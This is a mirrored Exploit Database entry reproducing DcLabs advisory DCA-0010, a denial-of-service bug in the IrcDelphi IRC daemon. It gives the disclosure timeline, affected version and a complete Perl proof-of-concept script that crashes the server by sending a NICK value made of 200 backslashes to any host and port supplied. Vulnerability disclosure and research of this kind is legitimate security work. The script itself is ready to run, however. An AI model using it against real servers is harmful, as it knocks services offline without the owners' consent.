IrcDelphi Daemon Server – Denial of Service

• Exploit Database
• 129 阅读

• 作者： Crash
  日期： 2010-07-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14266/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

  [DCA-0010]   [Software] - IrcDelphi Daemon Server   [Vendor Product Description] - IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy components. Easy to use and light irc daemon.   [Bug Description] - The IRC Daemon does not sanitize the variable NICK correctly leading to a Denial-of-Service flaw.   [History] - Advisory sent to vendor on 06/21/2010. - No response - Public adv. 07/02/2010   [Impact] - Low   [Affected Version] - IrcDelphi core-alpha1 - Prior versions may also be vulnerable.   [Codes]   #!/usr/bin/perl use IO::Socket;   if (@ARGV < 1) { usage(); }   $ip = $ARGV[0]; $port = $ARGV[1];   print "[+] Sending request...\n";   $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n"; print $socket "USER AA AA AA :AA\r\n"; print $socket "NICK ". "\\" x 200 ."\r\n";   sleep(3); close($socket);   print "[+] Done!\n";     sub usage() { print "[-] Usage: <". $0 ."> <host> <port>\n"; print "[-] Example: ". $0 ." 127.0.0.1 6667\n"; exit; } ----------------------------------------------------------------------------------------   DcLabs Security Group Sponsor: ipax ipax@dclabs.com.br   [Credits] Crash and all DcLabs members.